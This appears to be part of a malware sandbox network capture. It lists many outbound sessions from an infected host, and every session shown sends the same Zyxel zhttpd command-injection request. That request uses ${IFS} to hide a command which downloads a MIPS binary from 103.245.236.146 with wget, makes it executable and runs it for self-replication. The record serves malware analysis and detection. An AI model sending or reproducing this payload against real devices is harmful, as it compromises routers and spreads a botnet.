                                                        Jan 28, 2024 10:13:09.740222931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8739192.168.2.144442681.225.31.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740263939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8740192.168.2.1456638119.223.4.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740294933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8741192.168.2.145608473.203.82.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740339041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8742192.168.2.145361464.233.176.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740371943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8743192.168.2.1433724206.79.146.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740386963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8744192.168.2.1448376203.28.194.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740449905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8745192.168.2.1445158174.248.163.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740487099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8746192.168.2.1458854146.65.252.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740536928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8747192.168.2.1440902104.231.41.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740607977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8748192.168.2.1450888113.173.241.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740648985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8749192.168.2.144924848.175.19.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740698099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8750192.168.2.1443052114.226.162.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740715981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8751192.168.2.144139059.197.189.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740751028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8752192.168.2.1433168185.8.162.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740803957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8753192.168.2.1439474208.196.46.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740839958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8754192.168.2.145954473.247.67.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740864992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8755192.168.2.143962039.119.190.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740897894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8756192.168.2.143507878.110.133.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740942955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8757192.168.2.1452926197.240.155.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740979910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8758192.168.2.143770038.233.63.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741031885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8759192.168.2.144172839.236.193.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741072893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8760192.168.2.143790458.239.48.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741118908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8761192.168.2.1438524212.224.180.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741163969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8762192.168.2.1445280169.6.146.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741189957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8763192.168.2.1454784144.168.241.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741236925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8764192.168.2.1436460202.47.214.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741286039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8765192.168.2.144345234.59.212.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741326094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8766192.168.2.1457916115.239.200.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741358995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8767192.168.2.1458286144.122.28.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741374969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8768192.168.2.143776097.63.153.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741421938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8769192.168.2.145111097.174.228.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741442919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8770192.168.2.1455678195.82.30.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741467953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8771192.168.2.1435564179.52.237.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741503000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8772192.168.2.1457622195.39.2.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741561890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8773192.168.2.1449048171.208.145.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741611004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8774192.168.2.143476257.6.133.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741657019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8775192.168.2.145593451.253.78.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741686106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8776192.168.2.1441404147.231.20.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741707087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8777192.168.2.1441206188.109.162.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741750002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8778192.168.2.143372427.143.132.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741796017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8779192.168.2.1435726124.151.168.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741832018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8780192.168.2.144361466.14.84.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741868019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8781192.168.2.143511639.27.152.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741904974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8782192.168.2.1438786197.118.122.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741940975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8783192.168.2.144980838.18.26.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.741980076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8784192.168.2.1454916186.163.123.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742029905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8785192.168.2.1445020176.226.8.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742084026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8786192.168.2.145162668.221.53.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742115021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8787192.168.2.145257648.38.218.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742166996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8788192.168.2.1445572146.2.185.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742202997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8789192.168.2.143347675.144.137.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742258072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8790192.168.2.1437194195.165.245.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742292881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8791192.168.2.1451306175.67.106.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742332935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8792192.168.2.1454766212.77.39.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742362976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8793192.168.2.146024258.14.47.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742393970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8794192.168.2.1452352118.44.99.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742433071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8795192.168.2.144301067.91.232.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742485046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8796192.168.2.1433844181.17.242.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742527962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8797192.168.2.144418452.165.59.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742556095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8798192.168.2.145489896.168.68.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742605925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8799192.168.2.1452092195.127.233.148443
                                                        TimestampBytes transferredDirectionData
